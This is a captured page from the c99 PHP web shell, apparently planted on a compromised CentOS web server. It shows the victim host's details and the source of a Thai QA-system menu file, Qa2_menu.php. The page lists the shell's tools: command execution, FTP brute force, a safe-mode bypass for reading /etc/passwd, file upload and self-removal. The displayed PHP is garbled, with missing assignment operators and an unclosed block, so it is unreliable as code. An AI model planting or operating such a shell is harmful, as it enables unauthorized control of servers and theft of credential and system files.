!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/QA/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Qa2_menu.php (3.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
 session_start();
 if (session_is_registered("valid_user")&&session_is_registered("password")&&session_is_registered("Priority"))
 {
include("../include/FunctionDB.php");
include("../include/Function.php");
 ConnectDB();
 $sql "Select * From qa_standard_tb";
 $result  mysql_query($sql) or die("Error".mysql_error());
 $num mysql_num_rows($result);
?>
<html>
<head>
<title>Q A</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../css/style1.css" rel="stylesheet" type="text/css">
</head>

<body bgcolor="#006633">
<table width="100%" height="319" border="0" cellpadding="0" cellspacing="0">
  <tr> 
    <td height="70"> 
      <div align="center"><img src="../Image/qalogo2.jpg" width="500" height="70"> </div></td>
  </tr>
  <tr> 
    <td height="246" bgcolor="#006600"> 
      <table width="100%" border="0" align="center" cellpadding="0" cellspacing="5">
        <tr> 
          <td colspan="3" bgcolor="#004200"><div align="center"><img src="../Image/div2.gif" width="378" height="18"><img src="../Image/div2.gif" width="378" height="18"></div></td>
        </tr>
        <tr> 
          <td width="50%" rowspan="12" bgcolor="#004200">&nbsp;</td>
          <td width="4%">&nbsp;</td>
          <td width="46%">&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td><div align="center"><img src="../Image/traffic_bullet.gif" width="22" height="22" align="absmiddle"></div></td>
          <td><strong><font size="4" face="Tahoma"><a href="Qa_menu.php">หน้าแรก</a></font></strong></td>
        </tr>
        <tr> 
          <td><div align="center"><img src="../Image/traffic_bullet.gif" width="22" height="22" align="absmiddle"></div></td>
          <td><font size="4" face="Tahoma"><strong><a href="StandardList.php">ข้อมูลมาตรฐานงานประกัน</a></strong></font></td>
        </tr>
        <tr> 
          <td><div align="center"><img src="../Image/traffic_bullet.gif" width="22" height="22" align="absmiddle"></div></td>
          <td><strong><font size="4" face="Tahoma"><a href="AddResult.php">ประเมินผลลัพธ์แต่ละมาตรฐาน</a></font></strong></td>
        </tr>
        <tr> 
          <td><div align="center"><img src="../Image/traffic_bullet.gif" width="22" height="22" align="absmiddle"></div></td>
          <td><strong><font size="4" face="Tahoma"><a href="ResultList.php">สรุปผลการประเมิน</a></font></strong></td>
        </tr>
        <tr> 
          <td><div align="center"><img src="../Image/traffic_bullet.gif" width="22" height="22" align="absmiddle"></div></td>
          <td><strong><font color="#CCFF00" size="4" face="Tahoma"><a href="../logout.php">Logout</a></font></strong></td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <tr> 
          <td colspan="3" bgcolor="#004200"><div align="center"><img src="../Image/div2.gif" width="378" height="18"><img src="../Image/div2.gif" width="378" height="18"></div></td>
        </tr>
      </table>
    </td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>
<?php 
    }
else
{
    echo"<body bgcolor=\"#CCCCCC\">";
     echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo"<center>";
      echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
      echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> คุณไม่มีสิทธ์ใช้งาน</font>";
      echo"</center>";
      echo"</body>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]--